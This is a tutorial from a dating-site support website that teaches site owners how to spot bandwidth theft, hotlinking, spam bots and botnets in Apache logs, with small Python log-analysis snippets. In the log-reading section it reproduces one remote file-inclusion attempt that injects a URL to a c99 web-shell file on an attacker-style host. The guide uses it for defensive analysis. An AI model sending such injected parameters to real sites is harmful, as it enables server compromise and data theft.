Welcome to AllAboutDatingSites - aeDating & Dolphin Dating Technical Solutions. We hope your visit with us will enable you to make better informed decisions about enhancing and managing your Dating Site or Social Networking business.
Administrator
Bandwidth Bandits - A True Story & Tutorial
Who is stealing your bandwidth, or worse? Do you know?
This tutorial will help you find out whether bad guys are stealing your bandwidth and how to stop them. In the following pages, we will give you a little background information, describe some of the common ways your bandwidth is used and abused, and offer some practical suggestions for preventing the abuse and curtailing malicious activity by hacker bad guys who would happily destroy your entire site without a moment's hesitation, just for fun!

Introduction

In the following pages, we will identify some of the bad guys, their targets and some of the methods they use to steal your bandwidth. Then we will give you some examples of practical things you can do to identify and analyze your bandwidth usage and show you some procedures you can use to curtail the abuse.

By the end of this tutorial, if you READ it (don't just scan it) and apply the examples and instructions to your own site, you will be able to look at your log files and correctly interpret the information. Using this newly acquired skill, you will be able to accurately assess the threats to your site and write effective procedures to prevent bad guys from accessing your system. You will be able to measure the success of your effort and keep much of your bandwidth from evaporating into hyperspace.

In addition to analyzing your logs and responding to what you find, you will be able to develop and implement proactive solutions that prevent hostile requests from gaining access to your system, based on banning IP addresses and known signatures of bad guys. You will also be able to detect hotlinkers and prevent them from hijacking the media on your site, and you will be able to use multiple techniques to prevent spambots, site downloaders, email harvesters, content ripoff artists, media thieves and other bad guys from stealing bandwidth and content without your permission.
Finally, you will be able to develop and execute a proactive long-term plan to protect your online property and stop the thieves from carrying out their illegal activity on your site and stealing your bandwidth.

Caveats:

#1 All of the examples used in this tutorial come from real systems and work there. Most, if not all, of them have been "sanitized" for this paper and generally will not work on another system without modifications to customize them for a different site. Do not just "copy and paste" them and expect them to run as listed; they will not work!

#2 All of the examples presented can be optimized to execute more efficiently. We present them in the spirit of instruction for the beginner and not as a product "deliverable" from an expert source.

#3 All of the research for this document came from search engine lookups that can be easily verified, vendor websites (like apache.org), related public forums and personal experience. Some effort has been made to avoid, as much as possible, plagiarizing any of the material presented, though we noted that a disturbing amount of "identical" information, obviously from the same source, is posted all over the net by different entities (unfortunately this was true of some of the print versions we found as well). The second disturbing fact in the research is that very little information about this topic is current; even though the reality is "in your face" every day, not very much is being published about it. In any event, the examples presented here are either our original work or believed to be in the public domain.

Let's begin.

How the following chronicle evolved is relevant to becoming aware that bad guys are everywhere on the net and that you don't have to sit and "wait" for them to find you. You can definitely do things proactively to protect your site and stop the thieves from stealing your stuff online.
A couple of months ago, we had huge problems when our hosting was abruptly terminated by the service we were using or, to be more precise, they were shut down because they didn't pay their suppliers. As a result, our services suffered a succession of disruptions and at one point all of our services were shut down completely as well.

This initial problem led to a succession of unpleasant events, including an aggravating experience registering for a service at HostGator. We had gotten about half of our systems transferred and configured when we discovered that the whole service, for which we had legitimately paid a year in advance, had been abruptly and rudely terminated (by them). Having no manners, or worse, bad manners, they made no attempt to notify us of any problem; they just pulled the plug and terminated the whole service. Ultimately, we found out that their sales department is grotesquely incompetent. Apparently, they are too stupid to realize that "international" operations such as ours might have offices all over the world, which we do, and that IP addresses outside of the US are not necessarily bad guys, but that's another story for another time. In the process, they "red flagged" our legitimate credit card so we were unable to use it for anything. Stick with us, it's all related, we promise!

Playing it safe, or so we thought, we decided to go with the provider that helped bail us out during the mess with our defunct hosting company. They gave us an opportunity to recover all of our backup files and kept our operation up and running while the fiasco was in progress. The fact that they were using an "offshore" operation to provide support was not disclosed or known when we signed up for the service. We soon found out, however. At first this was not an issue, but within a week or so, when bad things started to happen, we discovered that it mattered a great deal.
As the drama unfolded, the problems that surfaced quickly exposed the fact that they were clearly ill equipped to resolve the configuration incompatibilities between their server and our operating requirements. Security and access issues started to surface, big time. For example, all of our Captcha security scripts were broken because they could not write to the temp folders. If we enabled the write permissions, the scripts would work once and then the system would reset the folders to read-only again. Unfortunately, if the Captcha scripts don't work, none of the forms work, including user registration. Instead of fixing their configuration problem, they blamed our script for the bad behavior. Ultimately, we were compelled to make yet another move to a different hosting service, but before this happened, we got our first lesson about botnets and hacker bad guys!

Keep in mind that, up to this point in time, we had never had a hacker or spambot problem, even though our operation had been running for several years.

During our second attempt to get our services back up and running with the "offshore operation", they needed to move our files to a new server under their control. We noticed problems with permissions on the new server and were sorting them out when all of a sudden, almost within minutes after all our files were moved, one of our aedating sites was attacked by a hacker from Turkey. This was a known bad boy with evil intentions. He was using an include file injection to try to gain direct access to the server and ultimately to the file system where the secure data is kept.

We had been forewarned about the hacker from Turkey and had already plugged the hole in our code that he needed for his assault. So, when he attacked, we were prepared and it wasn't an issue for us or our code, but it was a serious issue for the "offshore" people, who had no idea about injection attacks and perceived it as a catastrophic event.
For a time, they actually shut the server down in the hope that the Bad Boy from Turkey would go away. In truth, it did "look" like a huge problem, as the hacker was using an automated tool that "pounded" our site with a copious number of attempts from a huge number of different IP addresses, all bogus! Thankfully, but not surprisingly, all of them failed to gain access to our system. The attempt failed because the "vulnerability" had previously been reported by many of the security watchdogs and we had closed the hole that allowed the exploit just a few weeks before.

You should be aware that this attacker was/is not just some high school kid playing games. This Turkish Bandit was looking for financial information (and anything else he could find on the server) for bad purposes. We examined one of the scripts that the bad guy referenced in his attack and it contained instructions to download all of the log files and history from the server. In addition, the script provided the bad guy with shell access to the exploited system, which would have allowed access to the file system, including the security access information. As you know, some of these files contain details about merchant accounts and other sensitive financial information. Have no doubt about it! This dude is a bank robber, one account at a time!

While we were analyzing our log files, we noticed that the bad boy from Turkey wasn't the only thief in our midst. We also found that our images were being ripped off without our permission, mostly by robots, and we even noticed an "offline browser" that attempted to download the whole site. We also saw that we were getting many hundreds of hits from several IP addresses belonging to known Nigerian scammers and spammers, even though their registration rate had been minimal (probably because we promptly and summarily dispatch them during the approval loop, but this is still bandwidth consumption with no ROI for sure).
During the attack, we clearly recognized the service provider support team's inability to solve our access problems and respond appropriately to real threats to our system security. The solutions they offered made no sense. They knew nothing at all about server side scripting, PHP or how web applications work. They very obviously had no experience dealing with bad guys, so we were forced to move to yet another service provider.

Our new hosting service has an open source product called webalizer installed, and it is a pretty good analysis tool: it tells you where your bandwidth is going and identifies the hogs by IP address. If you have webalizer installed on your system, you should check it out. If you have not looked at the site statistics generated from your log files recently, or ever, you are sure to be surprised. If your site is anything like ours, you will see a huge number of hits from robots you never knew existed. You might wonder how they found your site. You might even wonder whether you registered with them and don't remember it. Well, the short answer is NO, none of the above! Most certainly, you didn't sign up for them to download your site, fill your forms up with SPAM or try to hack your site. They are on your site because they are programmed to be there, and their scripts are usually automated by unscrupulous people who are in the business of ripping off whatever they can from the internet in any way they can. To top it all off, they almost always do it invisibly, using forged credentials.

For simplicity, we assume bandwidth is "data transfer" measured in bytes over some period of time, usually a month. Generally, at least from a hosting perspective, bandwidth is the amount of data that goes back and forth between your server and the visitors to your site. It is determined by the size of your website, the number of visitors you receive and the type of content and services your site provides.
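If you do not have webalizer, the same "who are the hogs" question can be roughed out by hand. The following is only a minimal sketch in Python, assuming your server writes the common Apache access-log layout (client IP first, then the timestamp, the quoted request, the status code and the response size in bytes). The sample log lines, IP addresses and the function name are made up for illustration, and the byte counts only cover data sent by the server, so treat the totals as an approximation of what your host bills.

```python
import re
from collections import Counter

# Assumed layout: IP, identity, user, [time], "request", status, bytes, ...
LOG_PATTERN = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)

def bytes_by_ip(lines):
    """Return a Counter mapping client IP -> total response bytes sent."""
    totals = Counter()
    for line in lines:
        match = LOG_PATTERN.match(line)
        if match is None:
            continue  # skip lines that do not look like access-log entries
        size = match.group("bytes")
        # Apache writes "-" when no body was sent (for example a 304 reply).
        totals[match.group("ip")] += 0 if size == "-" else int(size)
    return totals

# Made-up sample entries; the addresses come from documentation-only ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2006:13:55:36 -0700] "GET /photos/a.jpg HTTP/1.1" 200 51200 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [10/Oct/2006:13:55:37 -0700] "GET /photos/b.jpg HTTP/1.1" 200 48800 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [10/Oct/2006:13:56:01 -0700] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [10/Oct/2006:13:56:02 -0700] "GET /index.php HTTP/1.1" 304 - "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    # Biggest consumers first.
    for ip, total in bytes_by_ip(SAMPLE_LOG).most_common():
        print(ip, total)
```

To try it on a real site you would pass an open log file instead of SAMPLE_LOG; the path to that file depends on your host.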
Almost all hosting service plans have bandwidth limitations. A good analogy for your hosting bandwidth is the typical cell phone model, where incoming and outgoing traffic combine into a total consumption figure; everything gets counted! In most hosting services, you purchase a plan that includes a certain amount of bandwidth per month. If you go over the limits of your plan, you can expect to be charged an additional fee for the excess bandwidth consumption, just as you would if you exceeded the call limits on your cell phone.

So, what are some of the ways that your bandwidth can be ripped off?

Hotlinking.

One of the most pervasive ways of stealing bandwidth is a practice known as hotlinking. This is a really bad practice where your excellent content, media or both have a "life" outside of your site. Without your knowledge, and most certainly without your permission, bad guys link directly to your content and/or media, promote their own site agenda, generate huge amounts of ad revenue from using your content and return nothing to you while sucking up a large chunk of your bandwidth resources.

The way it works is this: the bad guy builds a shell and fills it up with AdSense, banners and other affiliate advertising that he will get paid for if the ads get hit. For the content, he basically copies what's on your site (maybe even downloads it from your site) and points the images and media directly at your site's resources. Of course, this means that every time the bandwidth thief gets a visitor to his site, that visitor's browser hits your server for the hotlinked resources and your bandwidth counter gets charged for it. So, if the site stealing your bandwidth gets a lot of traffic, you could be in a lot of trouble with your host, owing them $$$ for resources you didn't use.
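The hotlinking pattern described above leaves a recognizable trace in your logs: a request for one of your media files whose Referer points at a page on somebody else's site. Here is a minimal sketch of that check in Python. The host names, the list of file extensions and the function name are assumptions for illustration only, and keep in mind that the Referer header can be blank or forged, so a hit is a lead to investigate rather than proof.

```python
from urllib.parse import urlparse

# Assumed list of media types worth protecting; adjust for your own site.
MEDIA_EXTENSIONS = (".jpg", ".jpeg", ".gif", ".png", ".swf", ".mp3")

# Hypothetical names for "your" site.
OWN_HOSTS = {"example.com", "www.example.com"}

def is_hotlink(path, referer, own_hosts):
    """True when a media file is requested from a page on someone else's site."""
    file_part = path.split("?", 1)[0].lower()
    if not file_part.endswith(MEDIA_EXTENSIONS):
        return False  # not a media file, so not hotlinking in this sense
    if not referer or referer == "-":
        return False  # blank referer: direct visit or a proxy that strips it
    host = (urlparse(referer).hostname or "").lower()
    return host not in own_hosts

if __name__ == "__main__":
    print(is_hotlink("/img/a.jpg", "http://thief.example.net/page.html", OWN_HOSTS))
    print(is_hotlink("/img/a.jpg", "http://www.example.com/gallery.php", OWN_HOSTS))
```

Treating a blank Referer as innocent is a deliberate choice in this sketch: many legitimate visitors arrive without one, and blocking them would cost you real traffic.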
Forms and Blog Comment Spamming and Injection Attempts

Although email used to be the vehicle of choice for spam distribution, forms and blogs have also become favorite targets for spammers, who shotgun sites with junk and use automated harvesting programs in an attempt to find new email targets, all in the hope of generating new respondents to the junk they deliver.

In addition to flooding the internet with junk to maintain their "responder" rates, spammers sell email lists. When you reply to a spammer, you verify that your email address is "deliverable". This makes your address valuable to the spammer, since deliverable addresses sell for a higher price. So, you might (or might not) stop receiving spam from that particular spammer, but you are very likely to start receiving junk mail from countless other spammers.

Spammers will use any form they can find on your site to try to get you to respond to them so they can confirm your email address: contact forms, add-a-link forms, blog comment forms, whatever they can find. So, the important thing is DO NOT RESPOND to them. No matter how good it might feel to flame them, resist the temptation. If you reply, they have your address and now they know it is a working address.

Blog comment spam is another Google affectation! Because Google has placed a high value on blogs as an authoritative resource, spammers have figured out how to convert that into revenue. Comment spam provides instant "credibility" and therefore higher PR, since blogs are heavily valued in the Google page rank algorithm. The higher ranking translates directly into more "customers" for the spammer. The spammers exploit the fact that open comment forms let anyone post HTML for free.

Basically, comment spam comes in two flavors. The first is automated spam - comments by programs (or bots) that trawl the web looking for comment forms and fill them out.
The second type is manual spam - these are the spammer professionals - real people trawling the web and posting spam themselves - and this is often the most difficult to beat.

So, here is how it works when done by a professional spammer. They actually read the blog article, then they post a comment related to the article. They might even use real names. The URLs that they post do not point to commercial domains, so they don't set off any red flags with Google, and the spammers end up with a domain that has a high Google Page Rank. Then they add links to their commercial websites to it to bump up their page ranks.

The automated spammers depend on scripts and programs to shotgun as many blog sites as they can find in as short a period of time as possible. Historically, they used automated scripts and/or robots to "crawl the web" for targets, but as you will see in the following section, evolution has made the game much more sophisticated and the rules of operation much more complicated.

Bad Bots, Botnets, Botnet Gangs and Zombie Recruits

Spammers have figured out how to get a lot of bang for no bucks! Recently, we have noticed that either spammers have taken lessons from hackers or hackers have turned spammers, because they are using "botnets" now.

Botnets are the latest "Plague" to hit the internet. A botnet is a network of compromised machines that can be remotely controlled by an attacker. Botnets exploit huge numbers of "unprotected" computers on the internet by infecting them with specialized viruses that allow the bad guys to "take over" the system and use it to their own advantage. The bad guys can access and remotely control the infected systems, which gives them a virtually invisible playing field for their nefarious activities. Detection is almost impossible and the owners of the compromised systems have no clue that their computers have been enlisted to serve another master.
Some of these botnets and spambots also use forms and blog comment fields to probe for "open door" vulnerabilities and to see whether their code can actually get into the system. This, of course, may have nothing at all to do with the message they are submitting; in fact, the message might be completely incoherent, save for a few bits of code embedded in it to test access to the system. Another favorite target is "unprotected" email forms that do not verify the data submitted to them. The bad guys use automated methods to perform injection attacks that give them system level access to computers on the net, which allows them free, almost invisible operation through some unsuspecting site that has been compromised.

With this new protection against efforts to shut them down, and many more automated distribution tools, they are relentless in their effort to flood the internet with their junk, routing their e-mail through computers owned by unsuspecting Net users and making it almost impossible to track down and stop the real "herbal Viagra" sellers.

Telling the difference between a hacker trying to find vulnerabilities in a system and a botnet executing its list of instructions is almost impossible today. The bad guys are all using similar, if not the same, scripts to perpetrate their illegal activity. However, botnets (also known as zombie armies) are the vehicle of choice today for most attacks.

Again, most of the computer owners are completely unaware that their systems have been set up to forward transmissions (including spam or viruses) to other computers on the Internet. In this scenario, the zombie machine is effectively being used as a computer "robot" or "bot" that serves the wishes of some master spam or virus originator. Most computers compromised in this way are home-based. Estimates of the number of computers infected and recruited now range in the millions worldwide.
According to a Symantec Internet Security Threat Report, through the first six months of 2006, they found 4,696,903 active botnet computers. With numbers like this, you can easily see how the entire internet has been negatively impacted recently by botnet gangs, not to mention the hundreds and thousands of additional spam messages showing up in your email box of late. The botnets can easily send millions of emails from hundreds of thousands of computers all over the globe with total impunity whenever it suits them (or, more to the point, whenever they need to recharge their bank accounts).

Aside from completely wiping out your available bandwidth and then some, here are the top 10 key reasons (according to [source not shown]):
Distributed Denial-of-Service Attacks

Botnets are infamous for shutting down sites by shotgunning so much junk and traffic at a server that it cannot function and ultimately just shuts down. Many times these attacks are in response to a specific event, like filing an abuse report against them or "playing with them", for example by using a provocative message in your custom spam trap or using some other script to "engage" the bad guys. NOT a good idea!

Spamming

We all know what this is and its impact on our reality. Something you maybe didn't know is that some botnets are capable of setting up SOCKS proxies that allow their zombie bots to be invisible while conducting their nefarious activities, and other botnets can easily run scripts to harvest email addresses. So, you can see that the botnets have many faces, and more often than not the spam you are receiving was sent from, or relayed via proxy through, an old Windows computer sitting in a home, maybe not even being used or only used occasionally. Botnets, of course, can also be used to send phishing mails, since phishing is a special case of spam.

Sniffing Traffic

This is one of the most disturbing discoveries about the botnets. Bots can also use a packet sniffer to watch for interesting clear-text data passing by a compromised machine. The sniffers are mostly used to retrieve sensitive information like usernames and passwords, as well as banking and financial information including credit and debit card data. But the sniffed data can also contain other interesting information.

Keylogging

Although this form of attack is a client side phenomenon, it is very distressing to know that most bots also offer keystroke capture features. With the help of a keylogger it is very easy for an attacker to retrieve sensitive information. An implemented filtering mechanism (e.g.
"I am only interested in key sequences near the keyword 'paypal.com'") further helps in stealing secret data. If you think about it for a minute, with this keylogger running on thousands of compromised machines in parallel, you can imagine how quickly and easily PayPal accounts can be harvested.

Spreading New Malware

Almost all, if not all, bots have the capability of self replication. Bots can easily be used to generate new bots. This is quite simple, since all bots implement mechanisms to download and execute a file via HTTP or FTP. Consider also the case of spreading an email virus using a botnet. A botnet with 10,000 zombie hosts can easily act as the launch base for a mail virus campaign that can be devastatingly effective. DO NOT OPEN THOSE ATTACHMENTS!

Installing Adware and Browser Helper Objects (BHOs)

This is another feature that has a client side perspective, at least in part. Botnets are routinely used for financial gain (this is one of the biggest money makers for them now). This works by setting up a fake website with some advertisements: the operator of this website negotiates a deal with some hosting companies that pay for clicks on ads. With the help of a botnet, these clicks can be "automated" and orchestrated so that thousands of bots click on the pay per click pop-ups. This process can be further enhanced if the bot hijacks the start page of a compromised machine, so that the "clicks" are executed each time the victim uses the browser.

Google AdSense Abuse

A similar abuse is also possible with Google's AdSense program. AdSense offers companies the possibility of displaying Google advertisements on their own website and earning money this way. The company earns money from clicks on these ads, for example per 10,000 clicks in one month.
An attacker can abuse this program by leveraging his botnet to click on these advertisements in an automated fashion with thousands of bots, thus artificially incrementing the click counter on the targeted PPC. This kind of usage for botnets is relatively simple to deploy and nearly impossible to detect when combined with a clever randomizing program.

Attacking IRC Chat Networks

Yet another client side issue that is especially popular among attackers is the so-called "clone attack". In this kind of attack, the controller orders each bot to connect a large number of clones to the victim IRC network. The victim is flooded by service requests from thousands of bots or by thousands of channel joins from these cloned bots. In this way, the victim IRC network is brought down, similar to a DDoS attack.

Manipulating Online Polls/Games

Online polls and games are getting more and more attention, and it is rather easy to manipulate them with botnets. Since every bot has a distinct IP address, every vote will have the same credibility as a vote cast by a real person. Online games can be manipulated in a similar way. We are currently aware of bots being used that way, and there is a chance that this will become more important in the future.

Mass Identity Theft

Combinations of the different functions described above can be used for large scale identity theft, one of the fastest growing crimes on the Internet. Bogus emails ("phishing mails") that pretend to be legitimate (such as fake PayPal or banking emails) ask their intended victims to go online and submit their private information. DO NOT DO IT! Without exception, ALL of the online merchant accounts emphatically and unequivocally state that they NEVER make requests for ANY personal financial information over the internet! The fake emails are generated and sent by bots via their spamming mechanism. These same bots can also host multiple fake websites pretending to be eBay, PayPal or a bank, and harvest personal information.
Just as quickly as one of these fake sites is shut down, another one can pop up. The resource is literally inexhaustible and quite flexible. In addition, keylogging and sniffing of traffic can also be used for mass identity theft.

As horrific and cataclysmic as this might sound, it is not. Spammers are not really that clever. They are now, and always have been, opportunistic. The reason they are able to get over is that the door has been left open for them. They use resources that have been left unprotected or simply unmonitored. Much of this clandestine and illegal activity can easily be stopped. At least on the server side, simply adding appropriate filters to scripts, verifying all user data and applying access control techniques can go a long way toward preventing the bad robots from accessing your site.

Stopping the botnets from recruiting unprotected home PCs is a mammoth problem. Solving this problem is quite beyond the scope of this document, and indeed it is one that has the best minds in the field baffled. If they haven't figured it out by now, you can bet the solution isn't going to come any time soon.

Next to an honest-to-goodness hacker break-in, bad bots probably represent the most serious threat to bandwidth consumption and/or site security for the small business website owner/operator. Bad bots come in an assortment of styles and functions, but they ALL do the same thing: suck up your resources.

Unfortunately, not all bots are bad, and some of them you actually NEED. So, telling the bad ones from the good ones is a challenge that you need to sort out as quickly as possible when dealing with them. The good guys are easier to manage for sure, as they pay attention to the content of the robots.txt file that you should have in your root folder to instruct them where they can and cannot go on your site. The Bad Bots generally don't care what's in the robots.txt file. They have their own agenda for what they think is important for them on your site.
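One practical way to use this difference is to compare what a robot actually requested with what your robots.txt told it to leave alone. The sketch below does that with Python's standard urllib.robotparser module. The robots.txt content, the folder names, the "ExampleBot" agent name and the helper function names are all assumptions for illustration; on a real site the requested paths would come from your log files.

```python
from urllib.robotparser import RobotFileParser

# Hypothetical robots.txt content; the folder names are placeholders.
ROBOTS_TXT = """\
User-agent: *
Disallow: /admin/
Disallow: /members/
"""

def build_parser(robots_text):
    """Load robots.txt rules from a string instead of fetching them."""
    parser = RobotFileParser()
    parser.parse(robots_text.splitlines())
    return parser

def disallowed_requests(user_agent, requested_paths, robots_text=ROBOTS_TXT):
    """Return the requested paths that robots.txt told this agent to avoid."""
    parser = build_parser(robots_text)
    return [p for p in requested_paths if not parser.can_fetch(user_agent, p)]

if __name__ == "__main__":
    paths = ["/index.php", "/admin/config.php", "/members/profile.php?id=7"]
    print(disallowed_requests("ExampleBot", paths))
```

A robot that shows up in this list more than once or twice is not reading robots.txt, or is ignoring it, which is a reasonable first signal that it belongs on your watch list.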
Aside from stealing your bandwidth, some of these bad bots actually steal your whole site, generally not for a good reason and certainly not to make your life better. These Site Download bots are hyped and sold as "Offline Browsers", with the arguable justification that you can download the whole site so you can analyze it "offline" in a more convenient location or when you don't have access to the internet. Their makers also claim that these downloaders are useful in development work for "synching" data.

Unfortunately, bad bots come in many different styles and flavors. Therefore, in order to launch an effective campaign to protect your bandwidth, you need to understand who they are and basically what they do. Fortunately, you have a great resource partner: the search engines. Do a search for "bad bot" and you'll find various lists, most written by web site owners who've noticed some strange behavior among the many bots visiting their sites.

Although the definition of a "bad bot" varies depending on who you ask, there are various behaviors that are generally considered bad, such as ignoring robots.txt. Trying to use robots.txt against bad bots that either don't read it or disobey it won't work, so you'll have to use other methods against them. Although some bad bots change both their User Agent and IP address, using one or the other (or both) to ban these bots remains an easily implemented solution. If you want more advanced methods, do a search for "robot trap".

To summarize the worst of the worst, you should be aware of each of the following bad bot descriptions when doing your research on what to look for in your log files.

Site Downloading Bots or Offline Browser Bots.

If you do a search for this type of robot, you will literally find hundreds of links to products that will download your entire site, including all images and other media.
As has been mentioned previously, these products are hyped as something that you should or may want to use on a regular basis so that you can, for example, do analysis or research "offline", or do maintenance on your website. Well, maybe! But that is certainly not how the bad guys use these tools. Many reports can be found on the internet of sites that were attacked by one of these bots and had their whole site reproduced intact under a different domain name, functioning as a competitor for the same customers. In addition, these bots waste bandwidth and server resources and slow down your site while they are doing the dirty deed.

Media Harvesting Bots.

These bots are actually sold for the express purpose of downloading media from the internet, which can certainly include any that might be on your site. Here is what the hype from go!zilla (now Bulletproof FTP) says on their myspace.com site: "BulletProof FTP is a fully automated FTP client, with many advanced features including automatic download resuming, leech mode, ftp search and much more. Perfect for personal or corporate Webmasters as well as for Software and Music traders."

Web sites using an abundance of multimedia or graphics content to sell their product or service are prime targets and are abused daily by users of software such as this. Thousands upon thousands of users are harvesting movies, sounds, images and other media directly from web sites without even visiting the web site or viewing the advertisements and products that the content was provided to promote. Media bots simply crawl over your site and download any and all media types they have been instructed to find. Users of this and similar software packages never see your site, so there is no opportunity at all to generate any revenue from them.
These are potentially the most harmful to you and your overall bandwidth consumption, as these files can get pretty massive depending on the type of media you have stored on your system. Media bots waste bandwidth and steal your content with no benefit to you whatsoever; their only effect is the negative one of sucking up your bandwidth.

Email Harvesting Spam Bots. These bots are the bad guys that almost everybody has heard about and knows from practical experience. Email "spam" bots crawl your web site searching for email addresses to be used for spam. In their simplest form, e-mail harvesting bots are simple programs that crawl websites trying to pick out e-mail addresses. Usually, the code that puts e-mail addresses on websites follows a very specific format using a mailto: link. By picking out this code, it's easy for the bots to find e-mail addresses on a website. Spammers now have surprisingly sophisticated scripts capable of instructing the email harvesting bots to run search engine queries for common terms used in their target market. For example, "computers" or "internet" or, more recently, "stock quotes" could be good search terms. The email harvesting bots then search the major search engines for these terms, and the search engines return a list of pages that match. Now that the harvester bots have a list of pages to analyze, they "visit" those pages and pick out all the e-mail addresses. As a bonus windfall, the typical e-mail harvester will also look for all the links on each of the pages, follow the links, and look for even more e-mail addresses and links! By searching for just a few terms, the e-mail harvester bots could look through many thousands, even millions, of web sites and get millions of current e-mail addresses. These bots are a complete waste of bandwidth and server resources and offer no benefit to site owners. They should always be blocked.
Notice that we have changed the spelling of "bot" from singular to plural throughout. This is because email harvesting bots are now very likely to be members of the "botnets" described earlier.

Surveillance Bots. All of the "spy bots" fall into this category. Some have the capability of real time monitoring. Many of these bots have very specific targets, like finding copyright violations. It is a bit weird that they use a questionable activity to find an illegal one, but that's life in the bot world: full of ambiguity. Some of these bots are specifically engineered to gather information for various purposes from which your website does not necessarily receive any benefit. Typical commercially available surveillance bots scour the Internet for news on topics chosen by their customers. The cost of these services can run anywhere from $500 a month to several hundred thousand dollars, depending upon the service and the client requirements. For the most part, these high priced services are targeted toward corporate competitive analysis and gathering corporate intelligence. With other bots, like eWatch, according to prnewswire, "you can immediately track your print and online media coverage plus monitor portals and public discussion areas on the Internet. Clients use eWatch to monitor public reputation, rumors, stock manipulation and insider trading." Not a surprise, but eWatch calls their surveillance bots a "Monitoring Tool". Well, let's think about this for a second: a rose is a rose even if you call it a tulip! Aside from the bots described here, you can find quite a large number of surveillance bots to do just about any kind of monitoring you can imagine, both commercial and freeware. As we know, surveillance bots have a duality that is troublesome.
They are blatantly promoted by the distributors and companies who produce them as legitimate and useful software tools, while on the other hand we know that the real problem comes when they are misused and abused, end up in your log files, and you have no clue what they are doing there or why. Depending on the type of website you have, you can see how these types of bots could be a disaster for your bandwidth, particularly if they were to come visiting with any regularity at all.

So, what can we do about this problem? In a word: plenty! The first thing you need to do is lose the "but I'm not technical" crutch, and you will find out that doing what you need to do to manage this problem is a lot simpler than you thought! For sure, the best tool you have for identifying the bandwidth robbers on your site is the set of log files on your server. Generally, the two logs you should be most interested in for keeping track of your bandwidth activity are your error log and your access log. These two files contain most of the information you need to start tracking down the bad guys on your system.

You can pretty much think of your access log file as a "sign in sheet" for anyone visiting your site. Basically, the log file tells you where your visitors came from, whether they were referred, and what pages they visited while on your site. It will also tell you about their activity, for example, whether they tried to submit one of your forms or tried to go someplace they should not, like the "includes" folder on your system. If they tried to "inject" something into one of your include files, you will see that in your log files too. Your error log files provide similar and very often complementary information that helps you "see" what has been happening on your server for whatever period of time you happen to be analyzing.
As mentioned, you probably have a log analysis tool in your control panel, but we are going to use the raw log data in the following section to explain the meaning of each of the components, so that you will clearly understand its content and be able to use it to protect your site.

So, what's in the log file? Every communication between a client browser and your Web server results in an entry in the server's log to record the transaction. A busy Web site can generate hundreds or even thousands of log entries per hour. Although the data captured in the log file can vary according to the type of server used, the directives used to define the LogFormat and the individual preferences of the system manager, most hosting companies tend to go with the "combined" format. The two common formats are created with the following directives:

LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"" combined

All of our log file examples will use the "combined" log file format, because that is what is used on our hosting service. The timeframes for displaying "current" log data may vary somewhat, again according to the requirements of the system manager who configured the server. If your server is configured to archive, say, every hour, then you might be better off choosing one of the archives to start your analysis. Although you can analyze an hour's worth of data at a time, you will find that at least a complete day's worth of information is more efficient and easier to manage. For example, one access to our site will fill up a single screen because it requests about a hundred icons to display the page. You can imagine what a task it is to sift through these to find the actual steps the visitor took. Once the visitor moves off the index page, however, the order of access is quite easy to distinguish and plainly visible.
Most, if not all, historical data is stored in compressed format, usually .gz, which is easily extracted with your favorite compression utility. Again, as with the live data, the amount of data and the time frame contained in each file can vary from server to server depending on its configuration. In general, a log file entry contains items such as the IP address of the computer requesting the file. On a side note, all of the data available from a log file can be compiled and combined in various ways to provide statistics or listings such as the number of requests made ("hits"); we are using the "combined" format in our examples.

One of the "seems like" drawbacks to doing log file analysis is that it is reactive by nature. You can only respond "after the fact", and you should realize that all of the information you are evaluating is "historical" and therefore limited in its usefulness in thwarting real time attacks on your system. However, the information is extremely useful in planning and implementing your strategy for future protection, because bad guys typically are not that bright. Creativity is not on their radar screen at all, so they use the SAME tactics over and over, which means that you can indeed prevent future attacks based on historical data.

By the way, if you are on Windows, Notepad does not display the access logs that well, so you should use WordPad instead, as it displays them correctly and handles the larger log files better than Notepad as well. The display is important because you need each record on a separate row without word wrap enabled, which makes for easier analysis. When a record wraps, it looks like a bit of a hodgepodge, but this does not prevent us from using it for analysis, as you will see shortly. The following snippet is a line taken from an actual log file and is a real injection attempt to "break in" to our system by a known hacker (sanitized for security).
81.215.94.10 - - [01/Nov/2006:10:05:26 -0500] "GET /inc/design.inc.php?dir[inc]=http://thebadguyspartnerincrime.com/c99.txt? HTTP/1.1" 200 60 "-" "Opera/9.01 (Windows NT 5.1; U; tr)"

Most hosting services make the log files available in the "control panel" you use to do site maintenance. In cPanel, the information is stored in two places, the error log and the raw log. To access the raw log, which is actually the file you need, you simply download it, unpack it and, if you are running on Windows, change the file extension from .com to .txt, because Windows thinks all .com files are executables.

Okay, so let's take a look at the data and see if we can figure out what is going on with it. This particular record was selected because it is an actual attempted "injection" attack on a live system by a bad guy from Turkey. By the way, this character is mindlessly wiping out significant numbers of unprotected AED systems on the internet for no apparent reason other than that he can. He replaces the whole system with a graphic of the Turkish national flag made up of binary digits, with a nonsense tirade written in Turkish on the bottom half of the display. It is vicious, infantile, cowardly and destructive behavior, and we hope he gets the justice he richly deserves.

Moving on to the analysis of the request, we see that the first component is called remotehost, and it may be the most important piece of data in the request. It is the IP address of the incoming request. This is an indispensable piece of information for finding out who made the call or where it was initiated (well, sometimes).
Scammers and spammers can be pretty clever in this regard, because it is pretty easy to "fake" an IP address or use a proxy or other device to conceal the real IP address, but we will put that discussion aside for the time being.

In the next two components, you see two dashes (- -). Each of these dashes means that some piece of information was not submitted. The first dash is the component known as remote logname, the logname of the remote user. This field is almost always, if not always, blank. In fact, a request with data in this component would be very rare indeed. The second dash is in the component called authuser and is supposed to contain the authenticated user name, which again is normally blank.

The fourth piece of data is called, surprise, surprise, the date. It contains the date and time of the request, followed by the server's offset from GMT. So this information not only tells you what time the request was submitted, it also tells you the time zone where the server resides.

